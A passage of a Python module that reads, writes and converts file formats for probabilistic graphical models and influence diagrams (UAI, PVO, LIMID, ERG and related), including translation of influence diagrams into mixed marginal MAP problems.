line.strip()\n if line_strip:\n yield line_strip\n\n\ndef get_a_token(filename):\n for each_line in get_a_line(filename):\n for each_token in each_line.split():\n if each_token:\n yield each_token\n\n\ndef make_valuations(factors, factor_types):\n valuations = []\n assert len(factors) == len(factor_types), 'length of both list should match'\n for f, t in zip(factors, factor_types):\n if t == 'P':\n valuations.append(Valuation(f, Factor([], 0.0) ))\n elif t == 'U':\n valuations.append(Valuation(Factor([], 1.0), f))\n else:\n raise FileReadError\n return valuations\n\n\ndef scope_of_vars_to_int(scope):\n return [v.label for v in scope]\n\n\ndef scopes_of_vars_to_int(scopes):\n return [scope_of_vars_to_int(sc) for sc in scopes]\n\n\ndef make_weights(var_types):\n return [1.0 if el == 'C' else 0.0 for el in var_types]\n\n\ndef remove_constant_factors(factors, is_log = False, 
factor_types=None):\n raise NotImplementedError\n\n\ndef remove_free_variables(factors, variables, var_types=None, weights=None):\n raise NotImplementedError\n\n\ndef remove_evidence():\n raise NotImplementedError\n\n\n########################################################################################################################\n# simple read and write functions\ndef read_uai(filename):\n # todo re-write and remove dependency\n \"\"\" read conventional uai file \"\"\"\n return readUai(filename) # returns list of factors\n\n\ndef read_evid(filename):\n # todo re-write and remove dependency\n return readEvidence14(filename)\n\n\ndef read_vo(filename):\n vars = []\n iw = None\n for each_line in get_a_line(filename):\n if not each_line.startswith('#'):\n vars.append(int(each_line))\n if iw is None and 'iw=' in each_line:\n iw = int(each_line.split('iw=')[-1])\n if vars[0] != len(vars)-1:\n raise FileReadError\n return vars[1:], iw # elim_order, induced width\n\n\ndef read_map(filename):\n vars = []\n for each_line in get_a_line(filename):\n if not each_line.startswith('#'):\n for each_token in each_line.split():\n vars.append(int(each_token))\n if vars[0] != len(vars)-1:\n raise FileReadError\n return vars[1:]\n\n\ndef read_pvo(filename):\n fp = open(filename, 'r')\n blocks = []\n for each_block in fp.read().split(';'):\n if len(each_block.strip()):\n if each_block.startswith('#'):\n continue\n current_block = [int(el) for el in each_block.split()]\n blocks.append(current_block)\n # blocks.append([int(el.strip()) for el in each_block.split() if not el.strip().startswith('#') and el.strip()])\n nvars = blocks[0][0] # first block total number of variables\n nblocks = blocks[1][0] # second block total number of blocks\n assert len(blocks[2:]) == nblocks, \"number of blocks wrong while reading pvo\"\n # if len(blocks[2:]) != nblocks:\n # raise FileReadError\n assert nvars == sum([len(el) for el in blocks[2:]]), \"number of variables wrong while reading pvo\"\n # if nvars != sum([len(el) for el in blocks[2:]]):\n # raise FileReadError\n fp.close()\n return blocks[2:], nblocks, nvars\n\n\ndef fix_pvo(filename):\n fp = open(filename, 'r')\n blocks = []\n for each_block in fp.read().split(';'):\n if len(each_block.strip()):\n if each_block.startswith('#'):\n continue\n current_block = [int(el) for el in each_block.split()]\n blocks.append(current_block)\n nvars = blocks[0][0] # first block total number of variables\n nblocks = blocks[1][0] # second block total number of blocks\n assert len(blocks[2:]) == nblocks, \"number of blocks wrong while reading pvo\"\n fp.close()\n\n history=set()\n old_blocks = blocks[2:]\n new_blocks = []\n if nvars != sum([len(el) for el in old_blocks]):\n for old_block in reversed(old_blocks): # temporal order\n current_bk = [b for b in old_block if b not in history]\n if current_bk:\n new_blocks.append(current_bk)\n history.update(current_bk)\n new_blocks = list(reversed(new_blocks)) # elim order\n assert sum([len(el) for el in new_blocks]) == nvars, \"the number of variables should match\"\n write_pvo_from_partial_elim_order(filename, new_blocks)\n\n\ndef read_mi(filename):\n gen = get_a_token(filename)\n num_vars = int(next(gen))\n var_types = [next(gen).upper() for _ in range(num_vars)]\n return num_vars, var_types # num vars, type of vars in upper case\n\n\ndef read_id(filename):\n gen = get_a_token(filename)\n num_vars = int(next(gen))\n var_types = [next(gen).upper() for _ in range(num_vars)]\n num_funcs = int(next(gen))\n factor_types = [next(gen).upper() 
for _ in range(num_funcs)]\n return num_vars, var_types, num_funcs, factor_types\n\n\ndef read_pt(filename):\n try:\n gen = get_a_token(filename)\n num_vars = int(next(gen))\n return [int(next(gen)) for _ in range(num_vars)]\n except:\n return []\n\n\ndef read_standard_uai(file_name, sort_scope=True, skip_table=False):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n file_info = {'domains': [], 'scopes': [], 'factors': []}\n gen = get_a_token(uai_file_name)\n type = next(gen)\n file_info['nvar'] = int(next(gen))\n file_info['domains'] = [int(next(gen)) for i in range(file_info['nvar'])]\n nfuncs = int(next(gen))\n for i in range(nfuncs):\n scope_size = int(next(gen))\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen))\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n if skip_table:\n for i in range(nfuncs):\n file_info['factors'].append(Factor(file_info['scopes'][i]))\n else:\n for i in range(nfuncs):\n num_rows = int(next(gen))\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in file_info['scopes'][i]) if len(file_info['scopes'][i]) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in file_info['scopes'][i]])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n return file_info\n\n\ndef write_standard_uai(file_name, file_info, file_type):\n uai_file = open(file_name, 'w')\n uai_file.write(\"{}\\n\".format(file_type))\n uai_file.write(\"{}\\n\".format(file_info['nvar']))\n uai_file.write(\"{}\\n\".format(\" \".join(str(el) for el in file_info['domains'])))\n uai_file.write(\"{}\\n\".format(len(file_info['scopes'])))\n for each_scope in file_info['scopes']:\n uai_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))]+[str(el) for el in each_scope])))\n uai_file.write(\"\\n\")\n for each_factor in file_info['factors']:\n uai_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n uai_file.close()\n\n\ndef write_vo_from_elim_order(file_name, elim_order, iw):\n vo_file_name = file_name if file_name.endswith(\".vo\") else file_name + \".vo\"\n vo_file = open(vo_file_name, 'w')\n vo_file.write(\"# iw={}\\n\".format(iw))\n vo_file.write((\"{}\\n\".format(len(elim_order))))\n for el in elim_order:\n vo_file.write(\"{}\\n\".format(el))\n vo_file.close()\n\n\ndef write_pvo_from_partial_elim_order(file_name, partial_variable_ordering):\n pvo_file = open(file_name, 'w')\n # partial variable ordering defines blocks of variables\n pvo_list = [el for el in partial_variable_ordering if len(el) > 0] # exclude zero length sub-list\n num_blocks = len(pvo_list)\n num_var = max(max(el) for el in pvo_list) + 1 # total var = largest var id + 1\n pvo_file.write(\"{};\\n\".format(num_var))\n pvo_file.write(\"{};\\n\".format(num_blocks))\n for block in pvo_list:\n pvo_file.write(\"{};\\n\".format(\" \".join((str(v) for v in block))))\n pvo_file.close()\n\n\ndef write_id_from_types(file_name, var_types, func_types):\n id_file = open(file_name, 'w')\n id_file.write(\"{}\\n\".format(len(var_types)))\n id_file.write(\"{}\\n\".format(\" 
\".join((el.upper() for el in var_types)))) # C, D\n id_file.write(\"{}\\n\".format(len(func_types)))\n id_file.write(\"{}\\n\".format(\" \".join((el.upper() for el in func_types)))) # P, U\n id_file.close()\n\n\ndef write_mi_from_types(file_name, var_types):\n mi_file = open(file_name, 'w')\n mi_file.write(\"{}\\n\".format(len(var_types)))\n mi_file.write(\"{}\\n\".format(\" \".join((el.upper() for el in var_types))))\n mi_file.close()\n\n\ndef write_map_from_types(file_name, var_types):\n map_file = open(file_name, 'w')\n dec_vars = [str(el) for el in range(len(var_types)) if var_types[el] == \"D\"]\n map_file.write(\"{}\\n\".format(len(dec_vars)))\n map_file.write(\"{}\\n\".format(\"\\n\".join(dec_vars)))\n map_file.close()\n\n\ndef write_map_from_list(file_name, map_vars):\n map_file = open(file_name, 'w')\n map_file.write(\"{}\\n\".format(len(map_vars)))\n map_file.write(\"{}\\n\".format(\"\\n\".join(str(el) for el in map_vars)))\n map_file.close()\n\n########################################################################################################################\n# read influence diagram or related\ndef read_uai_id(file_name, sort_scope=True, skip_table=False):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name +\".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n id_file_name = file_name.replace(\".uai\", \".id\") if file_name.endswith(\".uai\") else file_name + \".id\"\n pt_file_name = file_name.replace(\".uai\", \".pt\") if file_name.endswith(\".uai\") else file_name + \".pt\"\n\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types': [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n blocks, num_blocks, nvars = read_pvo(pvo_file_name)\n nvars, var_types, nfuncs, func_types = read_id(id_file_name)\n pseudo_tree = read_pt(pt_file_name)\n\n file_info['nvar'] = nvars\n file_info['blocks'] = blocks\n file_info['var_types'] = var_types\n file_info['factor_types'] = func_types\n file_info['scope_types'] = func_types # scope and func types are the same because no decision appears\n nprob = len([el for el in var_types if el == 'C'])\n ndec = nvars - nprob\n nutil = nfuncs - nprob\n file_info['nprob'] = nprob\n file_info['ndec'] = ndec\n file_info['nutil'] = nutil\n file_info['pseudo_tree'] = pseudo_tree\n\n # gen = readFileByTokens(uai_file_name, '(),') # split on white space, (, ), and ,\n gen = get_a_token(uai_file_name)\n type = next(gen)\n assert int(next(gen)) == nvars, \"nvars error\"\n file_info['domains'] = [int(next(gen)) for _ in range(nvars)]\n assert len(file_info['domains']) == nvars, \"domains error\"\n assert int(next(gen)) == nfuncs, \"nfuncs error\"\n for _ in range(nfuncs):\n scope_size = int(next(gen))\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen))\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n\n if skip_table:\n for i in range(nfuncs):\n file_info['factors'].append(Factor(file_info['scopes'][i]))\n else:\n for i in range(nfuncs):\n num_rows = int(next(gen))\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in file_info['scopes'][i]) if len(file_info['scopes'][i]) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = 
np.transpose(tab, tuple(np.argsort([v.label for v in file_info['scopes'][i]])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n return file_info\n\n\ndef read_erg(filename, sort_scope=True, skip_table=False):\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types': [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n # gen = readFileByTokens(filename, '(),') # split on white space, (, ), and ,\n gen = get_a_token(filename)\n type = next(gen)\n nvar = int(next(gen))\n file_info['nvar'] = nvar\n domains = []\n for i in range(nvar):\n domains.append(int(next(gen)))\n file_info['domains'] = domains\n var_type_dict = {}\n dec_vars = []\n for i in range(nvar):\n var_type_dict[i] = next(gen)\n if var_type_dict[i] in ['d', 'D']:\n dec_vars.append(i)\n file_info['var_types'].append('D' if var_type_dict[i]=='d' else 'C')\n file_info['ndec'] = len(dec_vars)\n file_info['nprob'] = nvar - file_info['ndec']\n temporal_order = []\n for i in range(nvar):\n temporal_order.append(int(next(gen)))\n nfactor = int(next(gen)) # sum of prob, dec, util\n file_info['nutil'] = nfactor - file_info['ndec'] - file_info['nprob']\n func_type_dict = {}\n for i in range(nfactor):\n func_type_dict[i] = next(gen) # p d u\n scope_size = int(next(gen)) # num vars in func\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen)) # get a var id\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n file_info['scope_types'].append(func_type_dict[i].upper())\n for i in range(len(file_info['scope_types'])): # read each table\n num_rows = int(next(gen)) # read num rows\n if num_rows == 0:\n continue\n else:\n # file_info['factors'].append(Factor(file_info['scopes'][i]))\n file_info['factor_types'].append(file_info['scope_types'][i])\n assert file_info['scope_types'][i] != 'D'\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n # current_table = []\n # for t in range(num_rows):\n # val = float(next(gen))\n # if val == 0:\n # val += ZERO\n # current_table.append(val)\n factor_size = tuple(v.states for v in file_info['scopes'][i]) if len(file_info['scopes'][i]) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in file_info['scopes'][i]])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n # from temporal ordering recover blocks; chance | dec | chance | dec | ... 
| hidden\n blocks = []\n current_block = []\n for i in temporal_order:\n if var_type_dict[i] in ['c', 'C']:\n current_block.append(i)\n else:\n if len(current_block): # first add obs\n blocks.append(current_block)\n current_block = []\n blocks.append([i]) # then add dec\n if len(current_block):\n blocks.append(current_block) # hidden chance vars\n file_info['blocks'] = list(reversed(blocks)) # return elim order; hidden vars -> dec -> obs\n file_info['nblock'] = len(blocks)\n return file_info\n\n\ndef read_limid(filename, sort_scope=True):\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types' : [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n # gen = readFileByTokens(filename, '(),') # split on white space, (, ), and ,\n gen = get_a_token(filename)\n type = next(gen)\n nvar = int(next(gen))\n file_info['nvar'] = nvar\n domains = []\n for i in range(nvar):\n domains.append(int(next(gen)))\n file_info['domains'] = domains\n file_info['nprob'] = int(next(gen))\n file_info['ndec'] = int(next(gen))\n file_info['nutil'] = int(next(gen))\n\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n scope_size = int(next(gen))\n current_scope = []\n for s in range(scope_size):\n var_id = int(next(gen)) # get a var id\n current_scope.append(Var(var_id, file_info['domains'][var_id]))\n file_info['scopes'].append(current_scope)\n if i < file_info['nprob']:\n file_info['scope_types'].append('P')\n elif i < file_info['nprob'] + file_info['ndec']:\n file_info['scope_types'].append('D')\n else:\n file_info['scope_types'].append('U')\n\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n if file_info['nprob'] <= i < file_info['nprob'] + file_info['ndec']:\n continue # skip decision tables; not shown in the file\n else:\n num_rows = int(next(gen))\n current_scope = file_info['scopes'][i]\n file_info['factor_types'].append('P' if i < file_info['nprob'] else 'U')\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in current_scope) if len(current_scope) else (1,)\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in current_scope])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n\n blocks = []\n decision_vars = []\n observed_vars = set()\n for i in range(file_info['nprob'], file_info['nprob']+file_info['ndec']):\n current_scope = [v.label for v in file_info['scopes'][i]]\n blocks.append(current_scope[:-1]) # the last var label is for decision\n blocks.append([current_scope[-1]]) # put decision in a separate block\n decision_vars.append(current_scope[-1])\n observed_vars.update(current_scope[:-1])\n hidden_vars = []\n for el in range(file_info['nvar']):\n if el in decision_vars:\n file_info['var_types'].append('D')\n elif el in observed_vars:\n file_info['var_types'].append('C')\n else:\n file_info['var_types'].append('C')\n hidden_vars.append(el)\n if hidden_vars:\n blocks.append(hidden_vars)\n file_info['blocks'] = list(reversed(blocks)) # return elim order; hidden vars -> ..\n file_info['nblock'] = len(blocks)\n return file_info\n\ndef read_maua(filename, sort_scope=False):\n file_info = {'nvar':0, 'domains':[], 'nprob':0, 
'ndec':0, 'nutil':0,\n 'scopes':[], 'scope_types' : [],\n 'factors':[], 'factor_types':[],\n 'blocks':[], 'var_types':[]}\n gen = get_a_token(filename)\n file_type = next(gen)\n if \"/*\" in file_type:\n while \"*/\" not in next(gen):\n pass\n file_type = next(gen)\n assert file_type == \"LIMID\"\n file_info['nprob'] = int(next(gen))\n file_info['ndec'] = int(next(gen))\n file_info['nutil'] =int(next(gen))\n file_info['nvar'] = file_info['nprob'] + file_info['ndec']\n # by conevnetion var from 0 to nprob-1 are chance vars and nprob to nvar-1 are decision vars\n file_info['domains'] = [int(next(gen)) for _ in range(file_info['nvar'])]\n # scopes are defined per each variable because ID is a DAG and 1 node can hold 1 function\n # maua's format only defines parents, different from UAI format https://github.com/denismaua/kpu-pp\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n num_pa = int(next(gen))\n if i < file_info['nprob'] + file_info['ndec']:\n current_scope = list(reversed([int(next(gen)) for _ in range(num_pa)])) + [i]\n else:\n current_scope = list(reversed([int(next(gen)) for _ in range(num_pa)]))\n current_scope = [Var(v, file_info['domains'][v]) for v in current_scope]\n file_info['scopes'].append(current_scope)\n if i < file_info['nprob']:\n file_info['scope_types'].append('P')\n elif i < file_info['nprob'] + file_info['ndec']:\n file_info['scope_types'].append('D')\n else:\n file_info['scope_types'].append('U')\n # read tables\n for i in range(file_info['nprob'] + file_info['ndec'] + file_info['nutil']):\n if file_info['nprob'] <= i < file_info['nprob'] + file_info['ndec']:\n continue # skip decision tables; not shown in the file\n else:\n num_rows = int(next(gen))\n current_scope = file_info['scopes'][i]\n file_info['factor_types'].append('P' if i < file_info['nprob'] else 'U')\n current_table = [float(next(gen)) for _ in range(num_rows)]\n if ZERO > 0:\n current_table = [el + ZERO for el in current_table if el == 0]\n factor_size = tuple(v.states for v in current_scope) if len(current_scope) else (1,)\n try:\n tab = np.array(current_table, dtype=float, order='C').reshape(factor_size)\n except:\n print(\"err\")\n if sort_scope:\n tab = np.transpose(tab, tuple(np.argsort([v.label for v in current_scope])))\n file_info['factors'].append(Factor(file_info['scopes'][i])) # Factor takes list of Vars as a VarSet, sorted\n file_info['factors'][-1].table = np.array(tab, dtype=float, order=orderMethod)\n # read partial variable ordering from decision scopes assuming decisions follow temporal order\n blocks = []\n decision_vars = []\n observed_vars = set()\n for i in range(file_info['nprob'], file_info['nprob']+file_info['ndec']):\n current_scope = [v.label for v in file_info['scopes'][i]]\n blocks.append(current_scope[:-1]) # the last var label is for decision\n blocks.append([current_scope[-1]]) # put decision in a separate block\n decision_vars.append(current_scope[-1])\n observed_vars.update(current_scope[:-1])\n hidden_vars = []\n for el in range(file_info['nvar']):\n if el in decision_vars:\n file_info['var_types'].append('D')\n elif el in observed_vars:\n file_info['var_types'].append('C')\n else:\n file_info['var_types'].append('C')\n hidden_vars.append(el)\n if hidden_vars:\n blocks.append(hidden_vars)\n file_info['blocks'] = list(reversed(blocks)) # return elim order, so starting from hidden vars -> ..\n file_info['nblock'] = len(blocks)\n return file_info\n\n\ndef read_uai_bn(filename):\n # read a BN and return a dict of dict\n # { var_id:\n # 
{domain_size, parent_vars, scope_vars, table_length, table}\n # }\n # BN uai file assumes that functions are shown in the order of variable labels and\n # the last variable of a scope is the head\n bn_lines = get_a_line(filename)\n bn_dict = {}\n print(\"reading uai file type of {}\".format(next(bn_lines)))\n num_vars = int(next(bn_lines))\n for ind, k in enumerate(next(bn_lines).split()):\n bn_dict[ind] = {}\n bn_dict[ind]['domain_size'] = int(k)\n assert len(bn_dict) == num_vars, \"num vars error\"\n num_funcs = int(next(bn_lines))\n ### encode scope\n for ind in range(num_funcs):\n scope = [int(v) for v in next(bn_lines).split()] # the first element is the scope size\n var_id = scope[-1]\n assert ind == var_id, \"bn assumes the n-th function is defined by the n-th variable\"\n assert scope[0] == (len(scope)-1), \"scope size error\"\n bn_dict[var_id]['parents'] = scope[1:-1] # parent variables\n bn_dict[var_id]['scope'] = scope[1:] # include self, scope shown in the file\n assert len(bn_dict[var_id]['scope']) > 0, \"scope must be greater than 0\"\n bn_dict[var_id]['table_length'] = 1\n for v in bn_dict[var_id]['scope']:\n bn_dict[var_id]['table_length'] *= bn_dict[v]['domain_size']\n ### store tables as a list\n for var_id in range(num_funcs):\n table_length = int(next(bn_lines))\n assert table_length == bn_dict[var_id]['table_length'], \"table length error\"\n cpt_values = []\n while len(cpt_values) < table_length:\n cpt_values.extend([float(val) for val in next(bn_lines).split()])\n bn_dict[var_id]['table'] = cpt_values\n return bn_dict\n\n\n########################################################################################################################\n# read pure mmap or mixed mmap\ndef read_uai_mmap(file_name, sort_scope=True):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n map_file_name = file_name if file_name.endswith(\".map\") else file_name + \".map\"\n\n file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0,\n 'scopes': [], 'scope_types': [],\n 'factors': [], 'factor_types': [],\n 'blocks': [], 'var_types': []}\n\n uai_info = read_standard_uai(uai_file_name, sort_scope)\n map_vars = read_map(map_file_name)\n\n file_info['nvar'] = len(uai_info['domains'])\n file_info['domains'] = uai_info['domains']\n file_info['ndec'] = len(map_vars)\n file_info['nprob'] = file_info['nvar'] - file_info['ndec']\n file_info['scopes'] = uai_info['scopes'] # list of Vars\n file_info['scope_types'] = ['P']* len(file_info['scopes'])\n file_info['factors'] = uai_info['factors'] # list of factors\n file_info['factor_types'] = file_info['scope_types']\n file_info['blocks'] = [[el for el in range(file_info['nvar']) if el not in map_vars], map_vars]\n file_info['var_types'] = ['D' if el in map_vars else 'C' for el in range(file_info['nvar'])]\n\n return file_info\n\n\ndef read_uai_mixed(file_name, sort_scope=True, skip_table=False):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name + \".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n mi_file_name = file_name.replace(\".uai\", \".mi\") if file_name.endswith(\".uai\") else file_name + \".mi\"\n\n file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0,\n 'scopes': [], 'scope_types': [], 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n\n uai_info = read_standard_uai(uai_file_name, sort_scope, skip_table)\n blocks, nblocks, nvars = read_pvo(pvo_file_name)\n 
num_vars, var_types = read_mi(mi_file_name)\n dec_vars = [el for el in range(num_vars) if var_types[el] == 'D']\n\n file_info['nvar'] = nvars\n file_info['domains'] = uai_info['domains']\n file_info['ndec'] = len(dec_vars)\n file_info['nprob'] = nvars - file_info['ndec']\n file_info['scopes'] = uai_info['scopes']\n file_info['scope_types'] = ['P'] * len(file_info['scopes'])\n file_info['factor_types'] = file_info['scope_types']\n file_info['factors'] = uai_info['factors'] # list of factors\n file_info['blocks'] = blocks\n file_info['var_types'] = var_types\n\n return file_info\n\n\n########################################################################################################################\n# translate influence diagram to pure mmap or mixed mmap\ndef translate_uai_id_to_mixed(id_file_info):\n mmap_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n\n mmap_file_info['nvar'] = id_file_info['nvar'] + 1\n mmap_file_info['domains'] = id_file_info['domains'] + [id_file_info['nutil']] # append 1 latent var\n mmap_file_info['nprob'] = id_file_info['nprob'] + 1\n mmap_file_info['ndec'] = id_file_info['ndec']\n latent_var_id = mmap_file_info['nvar'] - 1\n latent_var = Var(latent_var_id, id_file_info['nutil'])\n for scope_ind, scope in enumerate(id_file_info['scopes']):\n if id_file_info['scope_types'][scope_ind] == 'U':\n mmap_file_info['scopes'].append([latent_var] + scope) # prepend latent var\n else:\n mmap_file_info['scopes'].append(scope)\n mmap_file_info['scope_types'] = 'P'\n mmap_file_info['factor_types'] = 'P'\n mmap_file_info['var_types'] = id_file_info['var_types'] + ['C'] # the last latent variable is Chance/sum\n\n dec_vars = [i for i in range(id_file_info['nvar']) if id_file_info['var_types'][i] == 'D']\n if id_file_info['blocks'][0][0] in dec_vars:\n mmap_file_info['blocks'] = [[latent_var_id]] + [el for el in id_file_info['blocks']]\n else:\n mmap_file_info['blocks'] = [[latent_var_id]+id_file_info['blocks'][0]] + [el for el in id_file_info['blocks'][1:]]\n\n util_factor_count = 0\n for factor_ind, factor in enumerate(id_file_info['factors']):\n if id_file_info['factor_types'][factor_ind] == 'U':\n mmap_scope = mmap_file_info['scopes'][factor_ind] # scopes and factors follow same index\n mmap_factor_dim = tuple(v.states for v in mmap_scope) if len(mmap_scope) else (1,)\n util_factor_table = factor.t\n assert util_factor_table.shape == mmap_factor_dim[1:] # the first dim associated with the latent var\n assert mmap_factor_dim[0] == id_file_info['nutil']\n mmap_factor_table = np.ones(mmap_factor_dim, dtype=float, order='C')\n mmap_factor_table[util_factor_count] = util_factor_table\n util_factor_count += 1\n mmap_factor = Factor(mmap_scope)\n mmap_factor.t = mmap_factor_table\n mmap_file_info['factors'].append(mmap_factor)\n else:\n mmap_file_info['factors'].append(factor) # append the same factor\n return mmap_file_info\n\n\n# def translate_id_to_mmap(id_file_info):\n# mmap_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n# 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n# raise NotImplementedError\n# return mmap_file_info\n#\n#\n# def translate_mmap_to_id(mmap_file_info):\n# id_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n# 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n# raise 
NotImplementedError\n# return id_file_info\n#\n#\n# def translate_mixed_to_id(mmap_file_info):\n# id_file_info = {'nvar': 0, 'domains': [], 'nprob': 0, 'ndec': 0, 'nutil': 0, 'scopes': [], 'scope_types': [],\n# 'factors': [], 'factor_types': [], 'blocks': [], 'var_types': []}\n# raise NotImplementedError\n# return id_file_info\n\n\n########################################################################################################################\n# wrtie influence diagrams from file_info\ndef write_uai_id_from_info(file_name, file_info):\n uai_file_name = file_name if file_name.endswith(\".uai\") else file_name +\".uai\"\n pvo_file_name = file_name.replace(\".uai\", \".pvo\") if file_name.endswith(\".uai\") else file_name + \".pvo\"\n id_file_name = file_name.replace(\".uai\", \".id\") if file_name.endswith(\".uai\") else file_name + \".id\"\n uai_file = open(uai_file_name, 'w')\n uai_file.write(\"ID\\n\")\n uai_file.write(\"{}\\n\".format(file_info['nvar']))\n uai_file.write(\"{}\\n\".format(' '.join((str(el) for el in file_info['domains']))))\n uai_file.write(\"{}\\n\".format(file_info['nprob']+file_info['nutil']))\n for scope_ind, each_scope in enumerate(file_info['scopes']): # exclude decisions scope;\n if file_info['scope_types'][scope_ind] != 'D': # skip decision scopes in uai file\n uai_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))]+[str(el) for el in each_scope])))\n uai_file.write(\"\\n\")\n for each_factor in file_info['factors']: # scopes and factors follow the same order after removing decisions\n uai_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n uai_file.close()\n write_pvo_from_partial_elim_order(pvo_file_name, file_info['blocks'])\n write_id_from_types(id_file_name, file_info['var_types'], file_info['factor_types'])\n\n\ndef write_limid_from_info(file_name, file_info):\n limid_file_name = file_name if file_name.endswith(\".limid\") else file_name + \".limid\"\n limid_file = open(limid_file_name, 'w')\n limid_file.write(\"LIMID\\n\")\n limid_file.write(\"{}\\n\".format(file_info['nvar']))\n limid_file.write(\"{}\\n\".format(' '.join([str(el) for el in file_info['domains']])))\n limid_file.write(\"{}\\n\".format(file_info['nprob']))\n limid_file.write(\"{}\\n\".format(file_info['ndec']))\n limid_file.write(\"{}\\n\".format(file_info['nutil']))\n\n for scope_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['scope_types'][scope_ind] == 'P':\n limid_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n previous_block = []\n decision_temporal_order = []\n for each_block in reversed(file_info['blocks']):\n if len(each_block) == 1 and file_info['var_types'][each_block[0]] == 'D':\n decision_scope = previous_block + each_block # [ parents ] + [ decision ]\n decision_temporal_order.append(each_block[0])\n limid_file.write(\"{}\\n\".format(' '.join([str(len(decision_scope))] + [str(el) for el in decision_scope])))\n previous_block = each_block\n for scope_ind, each_scope in enumerate(file_info['scopes']):\n if file_info['scope_types'][scope_ind] == 'U':\n limid_file.write(\"{}\\n\".format(' '.join([str(len(each_scope))] + [str(el) for el in each_scope])))\n limid_file.write(\"\\n\")\n\n for f_ind, each_factor in enumerate(file_info['factors']):\n if file_info['factor_types'][f_ind] == 'P':\n limid_file.write(\"{:d}\\n\".format(each_factor.numel()) + \"\\n\".join(map(str, each_factor.t.ravel(order='C'))) + \"\\n\\n\")\n for f_ind, 
